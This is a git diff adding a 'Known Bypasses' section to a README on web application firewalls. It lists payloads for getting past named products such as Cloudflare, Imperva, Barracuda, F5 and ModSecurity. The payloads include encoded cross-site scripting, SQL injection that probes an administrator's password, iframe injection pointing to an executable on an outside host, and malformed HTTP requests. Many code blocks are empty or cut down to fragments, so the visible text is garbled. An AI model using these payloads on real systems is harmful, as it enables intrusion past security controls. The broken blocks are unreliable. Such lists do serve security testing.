diff --git a/README.md b/README.md index 5845ae9..43355c0 100644 --- a/README.md +++ b/README.md @@ -290,7 +290,7 @@ Wanna detect WAFs? Lets see how.
  • Detection Methodology:
  • @@ -1443,6 +1443,119 @@ __Drawbacks:__ ## Google Dorks Approach: +## Known Bypasses: +- __Cloudflare__ - Cross Site Scripting _([Source](https://waf.ninja/review-wafninja/))_ +``` +X +``` + +- __Imperva SecureSphere__ +* Cross Site Scripting _([Source](https://waf.ninja/review-wafninja/))_ +``` +%3Cimg%2Fsrc%3D%22x%22%2Fonerror%3D%22prom%5Cu0070t%2526%2523x28%3B%2526%2523x27%3B%2526%2523x58%3B%2526%2523x53%3B%2526%2523x53%3B%2526%2523x27%3B%2526%2523x29%3B%22%3E +``` +* SQL Injection _([Source 1](https://www.exploit-db.com/exploits/35729), [Source 2](https://www.exploit-db.com/exploits/28854))_ +``` +15 and '1'=(SELECT '1' FROM dual) and '0having'='0having' +stringindatasetchoosen%%' and 1 = any (select 1 from SECURE.CONF_SECURE_MEMBERS where FULL_NAME like '%%dministrator' and rownum<=1 and PASSWORD like '0%') and '1%%'='1 +``` + +- __Barracuda__ +- Cross Site Scripting _([Source](https://waf.ninja/review-wafninja/))_ +``` + +
    Right-Click Here + +``` +- HTML Injection _([Source](https://www.exploit-db.com/exploits/33423))_ +``` +/cgi-mod/index.cgi?&primary_tab=ADVANCED&secondary_tab=test_backup_server&content_only=1&&&backup_port=21&&backup_username=%3E%22%3Ciframe%20src%3Dhttp%3A//www.example.net/etc/bad-example.exe%3E&&backup_type=ftp&&backup_life=5&&backup_server=%3E%22%3Ciframe%20src%3Dhttp%3A//www.example.net/etc/bad-example.exe%3E&&backup_path=%3E%22%3Ciframe%20src%3Dhttp%3A//www.example.net/etc/bad-example.exe%3E&&backup_password=%3E%22%3Ciframe%20src%3Dhttp%3A//www.example.net%20width%3D800%20height%3D800%3E&&user=guest&&password=121c34d4e85dfe6758f31ce2d7b763e7&&et=1261217792&&locale=en_US +``` +- __dotDefender__ - Cross Site Scripting _([Source](https://waf.ninja/review-wafninja/))_ +``` + + + +``` +* GET - Cross Site Scripting _([Source](https://www.exploit-db.com/exploits/14355))_ +``` + +``` + +* POST Based Cross Site Scripting _([Source](https://www.exploit-db.com/exploits/14355))_ +``` + +``` + +- __Fortiweb__ - Cross Site Scripting _([Source](https://www.exploit-db.com/exploits/38100))_ +``` +/waf/pcre_expression/validate?redir=/success&mkey=0%22%3E%3Ciframe%20src=http://vuln-lab.com%20onload=alert%28%22VL%22%29%20%3C +/waf/pcre_expression/validate?redir=/success%20%22%3E%3Ciframe%20src=http://vuln-lab.com%20onload=alert%28%22VL%22%29%20%3C&mkey=0 +``` + +- __F5 ASM__ - Cross Site Scripting _([Source](https://waf.ninja/review-wafninja/))_ +``` +
    +"/>a +``` + +- __f5 BIG-IP__ - Cross Site Scripting _([Source](https://waf.ninja/review-wafninja/))_ +``` + +
    Right-Click Here + +
    Right-Click Here +``` + +- __ModSecurity__ - Cross Site Scripting _([Source](https://waf.ninja/review-wafninja/))_ +``` + + +``` + +- __Citrix NetScaler NS10.5__ - HTTP Parameter Pollution _([Source](https://www.exploit-db.com/exploits/36369))_ +``` + + + + ’ union select current_user, 2# + + +``` + +- __WebKnight__ - Cross Site Scripting _([Source](https://waf.ninja/review-wafninja/))_ +``` + + +
    +
    Right-Click Here +``` + +- __QuickDefense__ - Cross Site Scripting _([Source](https://waf.ninja/review-wafninja/))_ +``` +? +
    +``` + +- __Apache__ - Writing method type in lowercase. _([Source](https://github.com/Bo0oM/WAF-bypass-Cheat-Sheet))_ +``` +get /login HTTP/1.1 +Host: favoritewaf.com +User-Agent: Mozilla/4.0 (compatible; MSIE5.01; Windows NT) +``` + +- __IIS__ - Tabs before method _([Source](https://github.com/Bo0oM/WAF-bypass-Cheat-Sheet))_ +``` + GET /login.php HTTP/1.1 +Host: favoritewaf.com +User-Agent: Mozilla/4.0 (compatible; MSIE5.01; Windows NT) +``` + ## Awesome Tools ### WAF Fingerprinting: __1. Fingerprinting with [NMap](https://nmap.org)__: